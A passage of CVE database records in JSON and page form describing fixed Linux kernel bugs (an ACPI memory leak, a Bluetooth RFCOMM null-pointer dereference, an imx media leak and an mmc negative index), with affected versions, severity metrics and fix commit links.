"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()\n\nAfter unregistering the CPU idle device, the memory associated with\nit is not freed, leading to a memory leak:\n\nunreferenced object 0xffff896282f6c000 (size 1024):\n comm \"swapper/0\", pid 1, jiffies 4294893170\n hex dump (first 32 bytes):\n 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 8836a742):\n [\u003cffffffff993495ed\u003e] kmalloc_trace+0x29d/0x340\n [\u003cffffffff9972f3b3\u003e] acpi_processor_power_init+0xf3/0x1c0\n [\u003cffffffff9972d263\u003e] __acpi_processor_start+0xd3/0xf0\n [\u003cffffffff9972d2bc\u003e] acpi_processor_start+0x2c/0x50\n [\u003cffffffff99805872\u003e] really_probe+0xe2/0x480\n [\u003cffffffff99805c98\u003e] __driver_probe_device+0x78/0x160\n [\u003cffffffff99805daf\u003e] driver_probe_device+0x1f/0x90\n [\u003cffffffff9980601e\u003e] __driver_attach+0xce/0x1c0\n [\u003cffffffff99803170\u003e] bus_for_each_dev+0x70/0xc0\n [\u003cffffffff99804822\u003e] bus_add_driver+0x112/0x210\n [\u003cffffffff99807245\u003e] driver_register+0x55/0x100\n [\u003cffffffff9aee4acb\u003e] acpi_processor_driver_init+0x3b/0xc0\n [\u003cffffffff990012d1\u003e] do_one_initcall+0x41/0x300\n [\u003cffffffff9ae7c4b0\u003e] kernel_init_freeable+0x320/0x470\n [\u003cffffffff99b231f6\u003e] kernel_init+0x16/0x1b0\n [\u003cffffffff99042e6d\u003e] ret_from_fork+0x2d/0x50\n\nFix this by freeing the CPU idle device after unregistering it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:04.768Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d351bcadab6caa6d8ce7159ff4b77e2da35c09fa"
},
{
"url": "https://git.kernel.org/stable/c/ea96bf3f80625cddba1391a87613356b1b45716d"
},
{
"url": "https://git.kernel.org/stable/c/c2a30c81bf3cb9033fa9f5305baf7c377075e2e5"
},
{
"url": "https://git.kernel.org/stable/c/1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2"
},
{
"url": "https://git.kernel.org/stable/c/fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8"
},
{
"url": "https://git.kernel.org/stable/c/3d48e5be107429ff5d824e7f2a00d1b610d36fbc"
},
{
"url": "https://git.kernel.org/stable/c/8d14a4d0afb49a5b8535d414c782bb334860e73e"
},
{
"url": "https://git.kernel.org/stable/c/cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9"
},
{
"url": "https://git.kernel.org/stable/c/e18afcb7b2a12b635ac10081f943fcf84ddacc51"
}
],
"title": "ACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26894",
"datePublished": "2024-04-17T10:27:45.960Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-04T08:59:04.768Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26903 (GCVE-0-2024-26903)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security
During our fuzz testing of the connection and disconnection process at the
RFCOMM layer, we discovered this bug. By comparing the packets from a
normal connection and disconnection process with the testcase that
triggered a KASAN report. We analyzed the cause of this bug as follows:
1. In the packets captured during a normal connection, the host sends a
`Read Encryption Key Size` type of `HCI_CMD` packet
(Command Opcode: 0x1408) to the controller to inquire the length of
encryption key.After receiving this packet, the controller immediately
replies with a Command Completepacket (Event Code: 0x0e) to return the
Encryption Key Size.
2. In our fuzz test case, the timing of the controller's response to this
packet was delayed to an unexpected point: after the RFCOMM and L2CAP
layers had disconnected but before the HCI layer had disconnected.
3. After receiving the Encryption Key Size Response at the time described
in point 2, the host still called the rfcomm_check_security function.
However, by this time `struct l2cap_conn *conn = l2cap_pi(sk)->chan->conn;`
had already been released, and when the function executed
`return hci_conn_security(conn->hcon, d->sec_level, auth_type, d->out);`,
specifically when accessing `conn->hcon`, a null-ptr-deref error occurred.
To fix this bug, check if `sk->sk_state` is BT_CLOSED before calling
rfcomm_recv_frame in rfcomm_process_rx.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26903",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:41:13.860273Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-27T18:14:57.007Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.535Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/369f419c097e82407dd429a202cde9a73d3ae29b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f369efd9d963c1f711a06c9b8baf9f5ce616d85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d1753973f598531baaa2c1033cf7f7b5bb004b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/567c0411dc3b424fc7bd1e6109726d7ba32d4f73"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ead59bafad05f2967ae2438c0528d53244cfde5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f9fe302dd3a9bbc50f4888464c1773f45166bfd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2535b848fa0f42ddff3e5255cf5e742c9b77bb26"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/rfcomm/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "369f419c097e82407dd429a202cde9a73d3ae29b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5f369efd9d963c1f711a06c9b8baf9f5ce616d85",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d1753973f598531baaa2c1033cf7f7b5bb004b0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "567c0411dc3b424fc7bd1e6109726d7ba32d4f73",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3ead59bafad05f2967ae2438c0528d53244cfde5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5f9fe302dd3a9bbc50f4888464c1773f45166bfd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2535b848fa0f42ddff3e5255cf5e742c9b77bb26",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/rfcomm/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security\n\nDuring our fuzz testing of the connection and disconnection process at the\nRFCOMM layer, we discovered this bug. By comparing the packets from a\nnormal connection and disconnection process with the testcase that\ntriggered a KASAN report. We analyzed the cause of this bug as follows:\n\n1. In the packets captured during a normal connection, the host sends a\n`Read Encryption Key Size` type of `HCI_CMD` packet\n(Command Opcode: 0x1408) to the controller to inquire the length of\nencryption key.After receiving this packet, the controller immediately\nreplies with a Command Completepacket (Event Code: 0x0e) to return the\nEncryption Key Size.\n\n2. In our fuzz test case, the timing of the controller\u0027s response to this\npacket was delayed to an unexpected point: after the RFCOMM and L2CAP\nlayers had disconnected but before the HCI layer had disconnected.\n\n3. After receiving the Encryption Key Size Response at the time described\nin point 2, the host still called the rfcomm_check_security function.\nHowever, by this time `struct l2cap_conn *conn = l2cap_pi(sk)-\u003echan-\u003econn;`\nhad already been released, and when the function executed\n`return hci_conn_security(conn-\u003ehcon, d-\u003esec_level, auth_type, d-\u003eout);`,\nspecifically when accessing `conn-\u003ehcon`, a null-ptr-deref error occurred.\n\nTo fix this bug, check if `sk-\u003esk_state` is BT_CLOSED before calling\nrfcomm_recv_frame in rfcomm_process_rx."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:18.213Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/369f419c097e82407dd429a202cde9a73d3ae29b"
},
{
"url": "https://git.kernel.org/stable/c/5f369efd9d963c1f711a06c9b8baf9f5ce616d85"
},
{
"url": "https://git.kernel.org/stable/c/81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96"
},
{
"url": "https://git.kernel.org/stable/c/8d1753973f598531baaa2c1033cf7f7b5bb004b0"
},
{
"url": "https://git.kernel.org/stable/c/567c0411dc3b424fc7bd1e6109726d7ba32d4f73"
},
{
"url": "https://git.kernel.org/stable/c/3ead59bafad05f2967ae2438c0528d53244cfde5"
},
{
"url": "https://git.kernel.org/stable/c/5f9fe302dd3a9bbc50f4888464c1773f45166bfd"
},
{
"url": "https://git.kernel.org/stable/c/2535b848fa0f42ddff3e5255cf5e742c9b77bb26"
}
],
"title": "Bluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26903",
"datePublished": "2024-04-17T10:27:51.673Z",
"dateReserved": "2024-02-19T14:20:24.187Z",
"dateUpdated": "2025-05-04T08:59:18.213Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27076 (GCVE-0-2024-27076)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: imx: csc/scaler: fix v4l2_ctrl_handler memory leak
Free the memory allocated in v4l2_ctrl_handler_init on release.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 Version: a8ef0488cc592921a917362cca66af4a601987b9 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:58.321Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c2e4efe1278cd2b230cdbf90a6cefbf00acc282"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d9fe604bf9b5b09d2215225df55f22a4cbbc684"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1d0eebaf87cc9ccd05f779ec4a0589f95d6c18b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8df9a3c7044b847e9c4dc7e683fd64c6b873f328"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d164ddc21e986dd9ad614b4b01746e5457aeb24f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42492b00156c03a79fd4851190aa63045d6a15ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c92224721a439d6350db5933a1060768dcd565e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4797a3dd46f220e6d83daf54d70c5b33db6deb01"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27076",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T18:31:08.599457Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-08T15:02:53.804Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/staging/media/imx/imx-media-csc-scaler.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8c2e4efe1278cd2b230cdbf90a6cefbf00acc282",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "5d9fe604bf9b5b09d2215225df55f22a4cbbc684",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "b1d0eebaf87cc9ccd05f779ec4a0589f95d6c18b",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "8df9a3c7044b847e9c4dc7e683fd64c6b873f328",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "d164ddc21e986dd9ad614b4b01746e5457aeb24f",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "42492b00156c03a79fd4851190aa63045d6a15ce",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "6c92224721a439d6350db5933a1060768dcd565e",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
},
{
"lessThan": "4797a3dd46f220e6d83daf54d70c5b33db6deb01",
"status": "affected",
"version": "a8ef0488cc592921a917362cca66af4a601987b9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/staging/media/imx/imx-media-csc-scaler.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: imx: csc/scaler: fix v4l2_ctrl_handler memory leak\n\nFree the memory allocated in v4l2_ctrl_handler_init on release."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:47.372Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8c2e4efe1278cd2b230cdbf90a6cefbf00acc282"
},
{
"url": "https://git.kernel.org/stable/c/5d9fe604bf9b5b09d2215225df55f22a4cbbc684"
},
{
"url": "https://git.kernel.org/stable/c/b1d0eebaf87cc9ccd05f779ec4a0589f95d6c18b"
},
{
"url": "https://git.kernel.org/stable/c/8df9a3c7044b847e9c4dc7e683fd64c6b873f328"
},
{
"url": "https://git.kernel.org/stable/c/d164ddc21e986dd9ad614b4b01746e5457aeb24f"
},
{
"url": "https://git.kernel.org/stable/c/42492b00156c03a79fd4851190aa63045d6a15ce"
},
{
"url": "https://git.kernel.org/stable/c/6c92224721a439d6350db5933a1060768dcd565e"
},
{
"url": "https://git.kernel.org/stable/c/4797a3dd46f220e6d83daf54d70c5b33db6deb01"
}
],
"title": "media: imx: csc/scaler: fix v4l2_ctrl_handler memory leak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27076",
"datePublished": "2024-05-01T13:04:48.074Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T09:03:47.372Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35813 (GCVE-0-2024-35813)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mmc: core: Avoid negative index with array access
Commit 4d0c8d0aef63 ("mmc: core: Use mrq.sbc in close-ended ffu") assigns
prev_idata = idatas[i - 1], but doesn't check that the iterator i is
greater than zero. Let's fix this by adding a check.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f49f9e802785291149bdc9c824414de4604226b4 Version: 59020bf0999ff7da8aedcd00ef8f0d75d93b6d20 Version: 50b8b7a22e90bab9f1949b64a88ff17ab10913ec Version: c4edcd134bb72b3b0acc884612d624e48c9d057f Version: 1653a8102868264f3488c298a9f20af2add9a288 Version: eed9119f8f8e8fbf225c08abdbb58597fba807e0 Version: 4d0c8d0aef6355660b6775d57ccd5d4ea2e15802 Version: 4d0c8d0aef6355660b6775d57ccd5d4ea2e15802 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35813",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:23.725113Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:43:26.196Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.575Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9a7339ae403035ffe7fc37cb034b36947910f68"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b539c88940e22494da80a93ee1c5a28bbad10f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81b8645feca08a54c7c4bf36e7b176f4983b2f28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad9cc5e9e53ab94aa0c7ac65d43be7eb208dcb55"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4466677dcabe2d70de6aa3d4bd4a4fafa94a71f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/064db53f9023a2d5877a2d12de6bc27995f6ca56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d0e8a6147550aa058fa6ade8583ad252aa61304"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf55a7acd1ed38afe43bba1c8a0935b51d1dc014"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
